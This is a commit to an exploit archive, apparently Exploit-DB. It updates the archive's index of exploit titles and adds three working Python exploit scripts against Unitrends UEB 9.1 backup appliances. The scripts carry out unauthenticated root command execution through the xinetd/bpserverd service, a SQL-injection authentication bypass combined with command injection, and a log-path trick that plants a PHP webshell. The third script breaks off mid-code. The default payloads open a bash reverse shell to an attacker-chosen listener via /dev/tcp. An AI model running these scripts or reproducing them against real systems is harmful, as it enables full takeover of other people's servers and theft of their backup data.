DB: 2017-10-07
4 new exploits Konqueror 3.5.9 - (font color) Remote Crash Konqueror 3.5.9 - 'font color' Remote Crash Microsoft Windows 10 x64 RS2 - 'win32kfull!bFill' Pool Overflow hammer software metagauge 1.0.0.17 - Directory Traversal Hammer Software MetaGauge 1.0.0.17 - Directory Traversal Billion Router 7700NR4 - Remote Command Execution Billion 7700NR4 Router - Remote Command Execution Unitrends UEB 9.1 - 'Unitrends bpserverd' Remote Command Execution Unitrends UEB 9.1 - Authentication Bypass / Remote Command Execution else if CMS 0.6 - Multiple Vulnerabilities Else If CMS 0.6 - Multiple Vulnerabilities Picturesolution 2.1 - 'config.php path' Remote File Inclusion Picturesolution 2.1 - 'config.php' 'path' Remote File Inclusion tsmim Lessons Library - 'show.php' SQL Injection Tsmim Lessons Library - 'show.php' SQL Injection Simple Machines Forum (SMF) 1.1.6 - POST Filter Security Bypass Simple Machines Forum (SMF) 1.1.6 - 'POST' Filter Security Bypass PHP-Fusion v7.02.07 - Blind SQL Injection PHP-Fusion 7.02.07 - Blind SQL Injection ZTE ZXHN H108N - Unauthenticated Config Download ZTE ZXHN H108N Router - Unauthenticated Config Download Unitrends UEB 9.1 - Privilege Escalation
This commit is contained in:
parent
9ee6a8e2ee
commit
bfb5d80e10
5 changed files with 501 additions and 9 deletions
22
files.csv
22
files.csv
|
@ -820,7 +820,7 @@ id,file,description,date,author,platform,type,port
|
|||
6671,platforms/windows/dos/6671.c,"Microsoft Windows Vista - Access Violation from Limited Account Exploit (Blue Screen of Death)",2008-10-04,Defsanguje,windows,dos,0
|
||||
6672,platforms/windows/dos/6672.txt,"AyeView 2.20 - Invalid Bitmap Header Parsing Crash",2008-10-05,suN8Hclf,windows,dos,0
|
||||
6673,platforms/windows/dos/6673.txt,"FastStone Image Viewer 3.6 - '.BMP' Image Crash",2008-10-05,suN8Hclf,windows,dos,0
|
||||
6689,platforms/linux/dos/6689.txt,"Konqueror 3.5.9 - (font color) Remote Crash",2008-10-06,"Jeremy Brown",linux,dos,0
|
||||
6689,platforms/linux/dos/6689.txt,"Konqueror 3.5.9 - 'font color' Remote Crash",2008-10-06,"Jeremy Brown",linux,dos,0
|
||||
6704,platforms/linux/dos/6704.txt,"Konqueror 3.5.9 - (color/bgcolor) Multiple Remote Crash Vulnerabilities",2008-10-08,"Jeremy Brown",linux,dos,0
|
||||
6716,platforms/windows/dos/6716.pl,"Microsoft Windows - GDI+ (PoC) (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0
|
||||
6717,platforms/windows/dos/6717.py,"WinFTP Server 2.3.0 - (PASV mode) Remote Denial of Service",2008-10-09,dmnt,windows,dos,0
|
||||
|
@ -9279,6 +9279,7 @@ id,file,description,date,author,platform,type,port
|
|||
42937,platforms/linux/local/42937.txt,"UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape",2017-10-02,Sysdream,linux,local,0
|
||||
42948,platforms/osx/local/42948.txt,"Apple Mac OS X + Safari - Local Javascript Quarantine Bypass",2017-07-15,"Filippo Cavallarin",osx,local,0
|
||||
42951,platforms/windows/local/42951.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow",2017-10-03,C4t0ps1s,windows,local,0
|
||||
42960,platforms/win_x86-64/local/42960.txt,"Microsoft Windows 10 x64 RS2 - 'win32kfull!bFill' Pool Overflow",2017-10-06,siberas,win_x86-64,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -10312,7 +10313,7 @@ id,file,description,date,author,platform,type,port
|
|||
6656,platforms/windows/remote/6656.txt,"Microsoft Windows - GDI (EMR_COLORMATCHTOTARGETW) Exploit (MS08-021)",2008-10-02,Ac!dDrop,windows,remote,0
|
||||
6661,platforms/windows/remote/6661.txt,"Serv-U FTP Server 7.3 - Authenticated Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0
|
||||
6666,platforms/windows/remote/6666.pl,"mIRC 6.34 - Remote Buffer Overflow",2008-10-04,SkD,windows,remote,0
|
||||
6686,platforms/windows/remote/6686.txt,"hammer software metagauge 1.0.0.17 - Directory Traversal",2008-10-06,"Brad Antoniewicz",windows,remote,0
|
||||
6686,platforms/windows/remote/6686.txt,"Hammer Software MetaGauge 1.0.0.17 - Directory Traversal",2008-10-06,"Brad Antoniewicz",windows,remote,0
|
||||
6690,platforms/windows/remote/6690.html,"Skype extension for Firefox Beta 2.2.0.95 - Clipboard Writing",2008-10-07,irk4z,windows,remote,0
|
||||
6699,platforms/windows/remote/6699.html,"Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload (PoC)",2008-10-08,Nine:Situations:Group,windows,remote,0
|
||||
6750,platforms/hardware/remote/6750.txt,"Telecom Italia Alice Pirelli routers - Backdoor from internal LAN/WAN",2008-10-14,"saxdax & drpepperONE",hardware,remote,0
|
||||
|
@ -15646,7 +15647,7 @@ id,file,description,date,author,platform,type,port
|
|||
40457,platforms/windows/remote/40457.py,"Dup Scout Enterprise 9.0.28 - 'Login' Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
|
||||
40458,platforms/windows/remote/40458.py,"Disk Sorter Enterprise 9.0.24 - 'Login' Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
|
||||
40459,platforms/windows/remote/40459.py,"Disk Savvy Enterprise 9.0.32 - 'Login' Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
|
||||
40472,platforms/hardware/remote/40472.py,"Billion Router 7700NR4 - Remote Command Execution",2016-10-06,R-73eN,hardware,remote,0
|
||||
40472,platforms/hardware/remote/40472.py,"Billion 7700NR4 Router - Remote Command Execution",2016-10-06,R-73eN,hardware,remote,0
|
||||
40474,platforms/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote,0
|
||||
40491,platforms/multiple/remote/40491.py,"HP Client 9.1/9.0/8.1/7.9 - Command Injection",2016-10-10,SlidingWindow,multiple,remote,0
|
||||
40507,platforms/linux/remote/40507.py,"Subversion 1.6.6/1.6.12 - Code Execution",2016-10-12,GlacierZ0ne,linux,remote,0
|
||||
|
@ -15887,9 +15888,11 @@ id,file,description,date,author,platform,type,port
|
|||
42888,platforms/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",hardware,remote,0
|
||||
42891,platforms/windows/remote/42891.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - MITM Remote Code Execution",2017-09-28,hyp3rlinx,windows,remote,0
|
||||
42928,platforms/windows/remote/42928.py,"Sync Breeze Enterprise 10.0.28 - Buffer Overflow",2017-09-30,"Owais Mehtab",windows,remote,0
|
||||
42957,platforms/linux/remote/42957.py,"Unitrends UEB 9.1 - 'Unitrends bpserverd' Remote Command Execution",2017-08-08,"Jared Arave",linux,remote,0
|
||||
42938,platforms/linux/remote/42938.rb,"Qmail SMTP - Bash Environment Variable Injection (Metasploit)",2017-10-02,Metasploit,linux,remote,0
|
||||
42949,platforms/linux/remote/42949.txt,"UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Unauthenticated Root Remote Code Execution",2017-10-02,agix,linux,remote,0
|
||||
42952,platforms/windows/remote/42952.py,"ERS Data System 1.8.1 - Java Deserialization",2017-09-21,"West Shepherd",windows,remote,0
|
||||
42958,platforms/linux/remote/42958.py,"Unitrends UEB 9.1 - Authentication Bypass / Remote Command Execution",2017-08-08,"Jared Arave",linux,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -18717,9 +18720,9 @@ id,file,description,date,author,platform,type,port
|
|||
4485,platforms/php/webapps/4485.txt,"Trionic Cite CMS 1.2rev9 - Remote File Inclusion",2007-10-05,GoLd_M,php,webapps,0
|
||||
4486,platforms/asp/webapps/4486.txt,"Furkan Tastan Blog - SQL Injection",2007-10-05,CyberGhost,asp,webapps,0
|
||||
4489,platforms/php/webapps/4489.txt,"Joomla! Component panoramic 1.0 - Remote File Inclusion",2007-10-06,NoGe,php,webapps,0
|
||||
4490,platforms/php/webapps/4490.txt,"else if CMS 0.6 - Multiple Vulnerabilities",2007-10-06,"HACKERS PAL",php,webapps,0
|
||||
4490,platforms/php/webapps/4490.txt,"Else If CMS 0.6 - Multiple Vulnerabilities",2007-10-06,"HACKERS PAL",php,webapps,0
|
||||
4491,platforms/php/webapps/4491.php,"CMS Creamotion - 'securite.php' Remote File Inclusion",2007-10-06,"HACKERS PAL",php,webapps,0
|
||||
4492,platforms/php/webapps/4492.txt,"Picturesolution 2.1 - 'config.php path' Remote File Inclusion",2007-10-06,Mogatil,php,webapps,0
|
||||
4492,platforms/php/webapps/4492.txt,"Picturesolution 2.1 - 'config.php' 'path' Remote File Inclusion",2007-10-06,Mogatil,php,webapps,0
|
||||
4493,platforms/php/webapps/4493.txt,"SkaDate Online 5.0/6.0 - Remote File Disclosure",2007-10-06,SnIpEr_SA,php,webapps,0
|
||||
4494,platforms/php/webapps/4494.txt,"Verlihub Control Panel 1.7.x - Local File Inclusion",2007-10-07,TEAMELITE,php,webapps,0
|
||||
4495,platforms/php/webapps/4495.txt,"idmos-phoenix CMS - 'aural.php' Remote File Inclusion",2007-10-07,"HACKERS PAL",php,webapps,0
|
||||
|
@ -25740,7 +25743,7 @@ id,file,description,date,author,platform,type,port
|
|||
17926,platforms/php/webapps/17926.txt,"Easy Hosting Control Panel - Admin Authentication Bypass",2011-10-04,Jasman,php,webapps,0
|
||||
17927,platforms/php/webapps/17927.txt,"CF Image Hosting Script 1.3.82 - File Disclosure",2011-10-04,bd0rk,php,webapps,0
|
||||
18033,platforms/php/webapps/18033.txt,"Joomla! Component 'com_yjcontactus' - Local File Inclusion",2011-10-25,MeGo,php,webapps,0
|
||||
17935,platforms/php/webapps/17935.txt,"tsmim Lessons Library - 'show.php' SQL Injection",2011-10-06,M.Jock3R,php,webapps,0
|
||||
17935,platforms/php/webapps/17935.txt,"Tsmim Lessons Library - 'show.php' SQL Injection",2011-10-06,M.Jock3R,php,webapps,0
|
||||
17937,platforms/php/webapps/17937.txt,"URL Shortener Script 1.0 - SQL Injection",2011-10-07,M.Jock3R,php,webapps,0
|
||||
17938,platforms/php/webapps/17938.txt,"EFront 3.6.9 Community Edition - Multiple Vulnerabilities",2011-10-07,IHTeam,php,webapps,0
|
||||
17941,platforms/linux/webapps/17941.rb,"Spreecommerce 0.60.1 - Arbitrary Command Execution (Metasploit)",2011-10-07,Metasploit,linux,webapps,0
|
||||
|
@ -33116,7 +33119,7 @@ id,file,description,date,author,platform,type,port
|
|||
32455,platforms/php/webapps/32455.pl,"Website Directory - 'index.php' Cross-Site Scripting",2008-10-03,"Ghost Hacker",php,webapps,0
|
||||
32459,platforms/java/webapps/32459.txt,"VeriSign Kontiki Delivery Management System 5.0 - 'action' Parameter Cross-Site Scripting",2008-10-05,"Mazin Faour",java,webapps,0
|
||||
32461,platforms/php/webapps/32461.txt,"AmpJuke 0.7.5 - 'index.php' SQL Injection",2008-10-03,S_DLA_S,php,webapps,0
|
||||
32462,platforms/php/webapps/32462.txt,"Simple Machines Forum (SMF) 1.1.6 - POST Filter Security Bypass",2008-10-06,WHK,php,webapps,0
|
||||
32462,platforms/php/webapps/32462.txt,"Simple Machines Forum (SMF) 1.1.6 - 'POST' Filter Security Bypass",2008-10-06,WHK,php,webapps,0
|
||||
32463,platforms/php/webapps/32463.txt,"PHP Web Explorer 0.99b - main.php refer Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0
|
||||
32464,platforms/php/webapps/32464.txt,"PHP Web Explorer 0.99b - 'edit.php' File Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0
|
||||
32467,platforms/php/webapps/32467.txt,"Opera Web Browser 8.51 - URI redirection Remote Code Execution",2008-10-08,MATASANOS,php,webapps,0
|
||||
|
@ -36647,10 +36650,10 @@ id,file,description,date,author,platform,type,port
|
|||
38395,platforms/jsp/webapps/38395.txt,"ManageEngine ServiceDesk Plus 9.1 build 9110 - Directory Traversal",2015-10-05,xistence,jsp,webapps,8080
|
||||
38537,platforms/php/webapps/38537.txt,"WordPress Plugin ADIF Log Search Widget - 'logbook_search.php' Cross-Site Scripting",2013-05-27,k3170makan,php,webapps,0
|
||||
38400,platforms/php/webapps/38400.txt,"Alienvault Open Source SIEM (OSSIM) 4.3 - Cross-Site Request Forgery",2015-10-05,"MohamadReza Mohajerani",php,webapps,0
|
||||
38406,platforms/php/webapps/38406.txt,"PHP-Fusion v7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0
|
||||
38406,platforms/php/webapps/38406.txt,"PHP-Fusion 7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0
|
||||
38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution",2015-10-06,"Raffaele Forte",php,webapps,0
|
||||
38408,platforms/php/webapps/38408.txt,"Jaow CMS - 'add_ons' Parameter Cross-Site Scripting",2013-03-23,Metropolis,php,webapps,0
|
||||
38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N - Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0
|
||||
38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N Router - Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0
|
||||
38410,platforms/php/webapps/38410.txt,"WordPress Plugin Banners Lite - 'wpbanners_show.php' HTML Injection",2013-03-25,"Fernando A. Lagos B",php,webapps,0
|
||||
38411,platforms/python/webapps/38411.txt,"Zope Management Interface 4.3.7 - Cross-Site Request Forgery",2015-10-07,hyp3rlinx,python,webapps,0
|
||||
38413,platforms/php/webapps/38413.txt,"OrionDB Web Directory - Multiple Cross-Site Scripting Vulnerabilities",2013-03-27,3spi0n,php,webapps,0
|
||||
|
@ -38654,3 +38657,4 @@ id,file,description,date,author,platform,type,port
|
|||
42953,platforms/windows/webapps/42953.txt,"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution",2017-09-20,xxlegend,windows,webapps,0
|
||||
42954,platforms/php/webapps/42954.py,"ClipBucket 2.8.3 - Remote Code Execution",2017-10-04,"Meisam Monsef",php,webapps,0
|
||||
42956,platforms/hardware/webapps/42956.txt,"NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution",2017-09-27,"Kacper Szurek",hardware,webapps,0
|
||||
42959,platforms/php/webapps/42959.py,"Unitrends UEB 9.1 - Privilege Escalation",2017-08-08,"Jared Arave",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
166
platforms/linux/remote/42957.py
Executable file
166
platforms/linux/remote/42957.py
Executable file
|
@ -0,0 +1,166 @@
|
|||
# Exploit Title: Unauthenticated root RCE for Unitrends UEB 9.1
|
||||
# Date: 08/08/2017
|
||||
# Exploit Authors: Jared Arave, Cale Smith, Benny Husted
|
||||
# Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413
|
||||
# Vendor Homepage: https://www.unitrends.com/
|
||||
# Software Link: https://www.unitrends.com/download/enterprise-backup-software
|
||||
# Version: 9.1
|
||||
# Tested on: CentOS6
|
||||
# CVE: CVE-2017-12477
|
||||
|
||||
import socket
|
||||
import binascii
|
||||
import struct
|
||||
import time
|
||||
import sys
|
||||
from optparse import OptionParser
|
||||
|
||||
print """
|
||||
###############################################################################
|
||||
Unauthenticated root RCE for Unitrends UEB 9.1
|
||||
Tested against appliance versions:
|
||||
[+] 9.1.0-2.201611302120.CentOS6
|
||||
|
||||
This exploit uses roughly the same process to gain root execution
|
||||
as does the apache user on the Unitrends appliance. The process is
|
||||
something like this:
|
||||
|
||||
1. Connect to xinetd process (it's usually running on port 1743)
|
||||
2. This process will send something like: '?A,Connect36092'
|
||||
3. Initiate a second connection to the port specified
|
||||
in the packet from xinetd (36092 in this example)
|
||||
4. send a specially crafted packet to xinetd, containing the
|
||||
command to be executed as root
|
||||
5. Receive command output from the connection to port 36092
|
||||
6. Close both connections
|
||||
|
||||
NB: Even if you don't strictly need output from your command,
|
||||
The second connection must still be made for the command
|
||||
to be executed at all.
|
||||
###############################################################################
|
||||
"""
|
||||
|
||||
# Parse command line args:
|
||||
usage = "Usage: %prog -r <appliance_ip> -l <listener_ip> -p <listener_port>\n"\
|
||||
" %prog -r <appliance_ip> -c 'touch /tmp/foooooooooooo'"
|
||||
|
||||
parser = OptionParser(usage=usage)
|
||||
parser.add_option("-r", '--RHOST', dest='rhost', action="store",
|
||||
help="Target host w/ UNITRENDS UEB installation")
|
||||
parser.add_option("-l", '--LHOST', dest='lhost', action="store",
|
||||
help="Host listening for reverse shell connection")
|
||||
parser.add_option("-p", '--LPORT', dest='lport', action="store",
|
||||
help="Port on which nc is listening")
|
||||
parser.add_option("-c", '--cmd', dest='cmd', action="store",
|
||||
help="Run a custom command, no reverse shell for you.")
|
||||
parser.add_option("-x", '--xinetd', dest='xinetd', action="store",
|
||||
type="int", default=1743,
|
||||
help="port on which xinetd is running (default: 1743)")
|
||||
|
||||
(options, args) = parser.parse_args()
|
||||
|
||||
if options.cmd:
|
||||
if (options.lhost or options.lport):
|
||||
parser.error("[!] Options --cmd and [--LHOST||--LPORT] are mutually exclusive.\n")
|
||||
|
||||
elif not options.rhost:
|
||||
parser.error("[!] No remote host specified.\n")
|
||||
|
||||
elif options.rhost is None or options.lhost is None or options.lport is None:
|
||||
parser.print_help()
|
||||
sys.exit(1)
|
||||
|
||||
RHOST = options.rhost
|
||||
LHOST = options.lhost
|
||||
LPORT = options.lport
|
||||
XINETDPORT = options.xinetd
|
||||
|
||||
if options.cmd:
|
||||
cmd = options.cmd
|
||||
else:
|
||||
cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1 &'.format(LHOST, LPORT)
|
||||
|
||||
def recv_timeout(the_socket,timeout=2):
|
||||
the_socket.setblocking(0)
|
||||
total_data=[];data='';begin=time.time()
|
||||
while 1:
|
||||
#if you got some data, then break after wait sec
|
||||
if total_data and time.time()-begin>timeout:
|
||||
break
|
||||
#if you got no data at all, wait a little longer
|
||||
elif time.time()-begin>timeout*2:
|
||||
break
|
||||
try:
|
||||
data=the_socket.recv(8192)
|
||||
if data:
|
||||
total_data.append(data)
|
||||
begin=time.time()
|
||||
else:
|
||||
time.sleep(0.1)
|
||||
except:
|
||||
pass
|
||||
return ''.join(total_data)
|
||||
|
||||
print "[+] attempting to connect to xinetd on {0}:{1}".format(RHOST, str(XINETDPORT))
|
||||
|
||||
try:
|
||||
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s1.connect((RHOST,XINETDPORT))
|
||||
except:
|
||||
print "[!] Failed to connect!"
|
||||
exit()
|
||||
|
||||
data = s1.recv(4096)
|
||||
bpd_port = int(data[-8:-3])
|
||||
|
||||
print "[+] Connected! Cmd output will come back on {}:{}".format(RHOST, str(bpd_port))
|
||||
print "[+] Connecting to bpdserverd on {}:{}".format(RHOST, str(bpd_port))
|
||||
|
||||
try:
|
||||
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s2.connect((RHOST, bpd_port))
|
||||
except:
|
||||
print "[!] Failed to connect!"
|
||||
s1.close()
|
||||
exit()
|
||||
|
||||
print "[+] Connected! Sending the following cmd to {0}:{1}".format(RHOST,str(XINETDPORT))
|
||||
print "[+] '{0}'".format(cmd)
|
||||
|
||||
if (len(cmd) > 240):
|
||||
print "[!] This command is long; this might not work."
|
||||
print "[!] Maybe try a shorter command..."
|
||||
|
||||
cmd_len = chr(len(cmd) + 3)
|
||||
packet_len = chr(len(cmd) + 23)
|
||||
|
||||
packet = '\xa5\x52\x00\x2d'
|
||||
packet += '\x00' * 3
|
||||
packet += packet_len
|
||||
packet += '\x00' * 3
|
||||
packet += '\x01'
|
||||
packet += '\x00' * 3
|
||||
packet += '\x4c'
|
||||
packet += '\x00' * 3
|
||||
packet += cmd_len
|
||||
packet += cmd
|
||||
packet += '\x00' * 3
|
||||
|
||||
s1.send(packet)
|
||||
|
||||
print "[+] cmd packet sent!"
|
||||
print "[+] Waiting for response from {0}:{1}".format(RHOST,str(bpd_port))
|
||||
|
||||
data = recv_timeout(s2)
|
||||
|
||||
print "[+] Here's the output -> \n\n"
|
||||
|
||||
print data
|
||||
|
||||
print "[+] Closing ports, exiting...."
|
||||
|
||||
s1.close()
|
||||
s2.close()
|
||||
|
||||
# 3. Solution:
|
||||
# Update to Unitrends UEB 10
|
116
platforms/linux/remote/42958.py
Executable file
116
platforms/linux/remote/42958.py
Executable file
|
@ -0,0 +1,116 @@
|
|||
# Exploit Title: Unauthenticated root RCE for Unitrends UEB 9.1
|
||||
# Date: 08/08/2017
|
||||
# Exploit Authors: Cale Smith, Benny Husted, Jared Arave
|
||||
# Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413
|
||||
# Vendor Homepage: https://www.unitrends.com/
|
||||
# Software Link: https://www.unitrends.com/download/enterprise-backup-software
|
||||
# Version: 9.1
|
||||
# Tested on: CentOS6
|
||||
# CVE: CVE-2017-12478
|
||||
|
||||
import httplib
|
||||
import urllib
|
||||
import ssl
|
||||
import random
|
||||
import sys
|
||||
import base64
|
||||
import string
|
||||
from optparse import OptionParser
|
||||
|
||||
# Print some helpful words:
|
||||
print """
|
||||
###############################################################################
|
||||
Unauthenticated root RCE for Unitrends UEB 9.1
|
||||
Tested against appliance versions:
|
||||
[+] 9.1.0-2.201611302120.CentOS6
|
||||
|
||||
This exploit leverages a sqli vulnerability for authentication bypass,
|
||||
together with command injection for subsequent root RCE.
|
||||
|
||||
To use the exploit as written, make sure you're running a reverse
|
||||
shell listener somewhere, using a command like:
|
||||
|
||||
$ nc -nlvp 1234
|
||||
|
||||
Then, just specify the ip and port of the remote listener in the
|
||||
exploit command. Alternatively, modify this exploit to contain a
|
||||
command of your choosing by modifying the 'cmd' variable below.
|
||||
###############################################################################
|
||||
"""
|
||||
|
||||
# Disable SSL Cert validation
|
||||
if hasattr(ssl, '_create_unverified_context'):
|
||||
ssl._create_default_https_context = ssl._create_unverified_context
|
||||
|
||||
# Parse command line args:
|
||||
usage = "Usage: %prog -r <appliance_ip> -l <listener_ip> -p <listener_port>\n"\
|
||||
" %prog -c 'touch /tmp/foooooooooooo'"
|
||||
|
||||
parser = OptionParser(usage=usage)
|
||||
parser.add_option("-r", '--RHOST', dest='rhost', action="store",
|
||||
help="Target host w/ UNITRENDS UEB installation")
|
||||
parser.add_option("-l", '--LHOST', dest='lhost', action="store",
|
||||
help="Host listening for reverse shell connection")
|
||||
parser.add_option("-p", '--LPORT', dest='lport', action="store",
|
||||
help="Port on which nc is listening")
|
||||
parser.add_option("-c", '--cmd', dest='cmd', action="store",
|
||||
help="Run a custom command, no reverse shell for you.")
|
||||
|
||||
(options, args) = parser.parse_args()
|
||||
|
||||
if options.cmd:
|
||||
if (options.lhost or options.lport):
|
||||
parser.error("[!] Options --cmd and [--LHOST||--LPORT] are mututally exclusive.\n")
|
||||
|
||||
elif not options.rhost:
|
||||
parser.error("[!] No remote host specified.\n")
|
||||
|
||||
elif options.rhost is None or options.lhost is None or options.lport is None:
|
||||
parser.print_help()
|
||||
sys.exit(1)
|
||||
|
||||
RHOST = options.rhost
|
||||
LHOST = options.lhost
|
||||
LPORT = options.lport
|
||||
if options.cmd:
|
||||
cmd = options.cmd
|
||||
else:
|
||||
cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1 &'.format(LHOST, LPORT)
|
||||
|
||||
url = '/api/storage/'
|
||||
|
||||
# Here, a SQLi string overrides the uuid, providing auth bypass.
|
||||
# We'll need to base64 encode before sending...
|
||||
auth = base64.b64encode("v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0")
|
||||
|
||||
params = urllib.urlencode({'auth' : auth})
|
||||
|
||||
params = """{{"type":4,"name":"aaaaaaaa","usage":"archive","properties":{{"username":"km","password":"km","port":"445","hostname":"asdf.com","protocol":"cifs","share_name":"`{0}`"}}}}""".format(cmd)
|
||||
|
||||
headers = {'Host' : RHOST,
|
||||
'Content-Type' : 'application/json',
|
||||
'X-Requested-With' : 'XMLHttpRequest',
|
||||
'AuthToken' : auth }
|
||||
|
||||
# Establish an HTTPS connection and send the payload.
|
||||
conn = httplib.HTTPSConnection(RHOST, 443)
|
||||
conn.set_debuglevel(1)
|
||||
|
||||
print """
|
||||
[+] Sending payload to remote host [https://{0}]
|
||||
[+] Here's some debug info:
|
||||
""".format(RHOST)
|
||||
|
||||
conn.request("POST", url, params, headers=headers)
|
||||
r1 = conn.getresponse()
|
||||
|
||||
print ""
|
||||
print "[+] Request sent. Maybe your command was executed?"
|
||||
print ""
|
||||
|
||||
# Print response, for debug purposes.
|
||||
print r1.status, r1.reason
|
||||
print r1.read()
|
||||
|
||||
# 3. Solution:
|
||||
# Update to Unitrends UEB 10
|
189
platforms/php/webapps/42959.py
Executable file
189
platforms/php/webapps/42959.py
Executable file
|
@ -0,0 +1,189 @@
|
|||
# Exploit Title: Authenticated lowpriv RCE for Unitrends UEB 9.1
|
||||
# Date: 08/08/2017
|
||||
# Exploit Authors: Benny Husted, Jared Arave, Cale Smith
|
||||
# Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413
|
||||
# Vendor Homepage: https://www.unitrends.com/
|
||||
# Software Link: https://www.unitrends.com/download/enterprise-backup-software
|
||||
# Version: 9.1
|
||||
# Tested on: CentOS6
|
||||
# CVE: CVE-2017-12479
|
||||
|
||||
import httplib
|
||||
import urllib
|
||||
import ssl
|
||||
import sys
|
||||
import base64
|
||||
import random
|
||||
import time
|
||||
import string
|
||||
import json
|
||||
from optparse import OptionParser
|
||||
|
||||
# Print some helpful words:
|
||||
print """
|
||||
###############################################################################
|
||||
Authenticated lowpriv RCE for Unitrends UEB 9.1
|
||||
Tested against appliance versions:
|
||||
[+] 9.1.0-2.201611302120.CentOS6
|
||||
|
||||
This exploit utilizes some issues in UEB9 session handling to place a
|
||||
php exec one liner in the webroot of the appliance.
|
||||
|
||||
Session tokens looks like this:
|
||||
|
||||
djA6NmM0ZWMzYTEtZmYwYi00MTIxLTk3YzYtMjQzODljM2EyNjY1OjE6L3Vzci9icC9sb2dzLmRpci9ndWlfcm9vdC5sb2c6MA==
|
||||
|
||||
and decodes to this:
|
||||
LOG_LVL ----,
|
||||
v --- UUID ----------------------- v v -- LOG_DIR -----------v v
|
||||
v0:6c4ec3a1-ff0b-4121-97c6-24389c3a2665:1:/usr/bp/logs.dir/gui_root.log:0
|
||||
|
||||
The general steps that are followed by this poc are:
|
||||
|
||||
1. Authenticate as a low priv user and receive an auth token.
|
||||
2. Modify the LOG_DIR field to point to a directory in the web root
|
||||
with apache user write access, and make a request to an arbitrary resource.
|
||||
This should touch a new file at the desired location.
|
||||
3. Replace the UUID token in this auth token with a php shell_exec on liner,
|
||||
and modify the LOG_LVL parameter to a value of 5, which will ensure
|
||||
that the UUID is reflected into the log file.
|
||||
4. Issue a final request, to generate a shell.php file with a single shell_exec.
|
||||
This step is not strictly necessary.
|
||||
###############################################################################
|
||||
"""
|
||||
|
||||
# Disable SSL Cert validation
|
||||
if hasattr(ssl, '_create_unverified_context'):
|
||||
ssl._create_default_https_context = ssl._create_unverified_context
|
||||
|
||||
# Parse command line args:
|
||||
usage = "Usage: %prog -r <appliance_ip> -u <username> -p <password>\n"\
|
||||
|
||||
parser = OptionParser(usage=usage)
|
||||
parser.add_option("-r", '--RHOST', dest='rhost', action="store",
|
||||
help="Target host w/ UNITRENDS UEB installation")
|
||||
parser.add_option("-u", '--username', dest='username', action="store",
|
||||
help="User with any amount of privilege on unitrends device")
|
||||
parser.add_option("-p", '--password', dest='password', action="store",
|
||||
help="password for this user")
|
||||
|
||||
(options, args) = parser.parse_args()
|
||||
|
||||
if not options.rhost:
|
||||
parser.error("[!] No remote host specified.\n")
|
||||
|
||||
elif options.rhost is None or options.username is None or options.password is None:
|
||||
parser.print_help()
|
||||
sys.exit(1)
|
||||
|
||||
RHOST = options.rhost
|
||||
username = options.username
|
||||
password = options.password
|
||||
|
||||
################################################################
|
||||
# REQUEST ONE: GET A UUID.
|
||||
################################################################
|
||||
|
||||
url1 = '/api/login'
|
||||
|
||||
a = {"username" : username,
|
||||
"password" : password}
|
||||
|
||||
post_body = json.dumps(a)
|
||||
|
||||
headers1 = {'Host' : RHOST}
|
||||
|
||||
print "[+] Attempting to log in to {0}, {1}:{2}".format(RHOST, username, password)
|
||||
|
||||
conn = httplib.HTTPSConnection(RHOST, 443)
|
||||
conn.set_debuglevel(0)
|
||||
conn.request("POST", url1, post_body, headers=headers1)
|
||||
r1 = conn.getresponse()
|
||||
|
||||
